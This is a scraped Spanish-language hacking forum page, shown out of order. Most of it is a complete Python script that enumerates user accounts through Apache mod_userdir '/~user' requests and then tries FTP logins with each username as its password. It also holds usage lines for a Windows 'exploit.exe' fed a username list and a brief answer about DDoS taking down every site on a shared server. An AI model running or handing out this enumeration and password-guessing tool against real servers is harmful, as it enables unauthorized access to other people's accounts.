Lo pegas en un archivo y le das permisos de ejecucion al archivo, estas en linux no?
Tenes que tener python instalado.
Tenes que tener python instalado.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menú
#!/usr/bin/python
import sys
import httplib
from ftplib import FTP
def usage():
print "Usage:"
print sys.argv[0] + " localhost users.txt"
return
if len(sys.argv) < 3:
print "#ERROR# Not enough arguments"
usage()
exit()
host = sys.argv[1]
fusers = sys.argv[2]
# Abrir archivo con usuarios
users = open(fusers, 'r')
print "Search for http users"
# Intentar conexiones por http y guardar los usuarios validos
valid_users = []
for user in users:
user = user.strip()
if not user:
continue
# Conectarse al servidor http
conn = httplib.HTTPConnection(host)
# Probar con el usuario user
print "Trying user " + user + " ...",
conn.request("GET", "/~{0}".format(user))
res = conn.getresponse()
if res.status == 404: # respuesta 404
print "not found"
else:
print "OK!"
# Salvar usuario
valid_users.append(user)
# Salir si no se encontro ningun usuario
if len(valid_users) == 0:
print "No user has been found. Aborting!"
exit()
# Probar por ftp ahora
print "Try login to ftp server"
for vuser in valid_users:
print "Trying user " + vuser + "...",; sys.stdout.flush()
try:
ftp = FTP(host, user = vuser, passwd = vuser)
ftp.quit()
print "OK!"
except:
print "refused"
Cita de: SySc0d3r en 7 Octubre 2011, 20:38 PMEl archivo tiene que estar obligatoriamente en la misma carpeta que el exploit.exe
Sólo una cosa, ¿puedo usar el exploit desde este ordenador, por ejemplo, e intentar atacar un server alojado en otro ordenador que contiene el archivo con los usuarios? ¿O este archivo tiene que estar obligatoriamente en el misma carpeta que exploit.exe?
Cita de: SySc0d3r en 6 Octubre 2011, 12:39 PM
Al final encontré el archivo mod_userdir en la carpeta de Apache, y tiene extensión ".so".
¿Tengo que poner simplemente ésto para atacar mi server?
exploit.exe -f -h localhost -u mod_userdir.so
admin
goku
neo
luke
kirk
elbrujo
exploit.exe -f -h localhost -u users.txt
exploit.exe -f -h localhost -u archivo_con_usuarios.txt
Cita de: Lukhardy en 6 Septiembre 2011, 00:19 AMSi, se caen todos los sitios de ese servidor. O sea, saturas el daemon httpd para que no acepte mas pedidos legitimos, sea el dominio que sea que este manejando.
Una duda tengo. Si se hace un DDOS a una direccion de sitio web, ¿se caen todos los sitios alojados en el mismo servidor, o solo el sitio? La lógica me dice que sí, pero quiero asegurarme según sus comentarios.
Gracias che.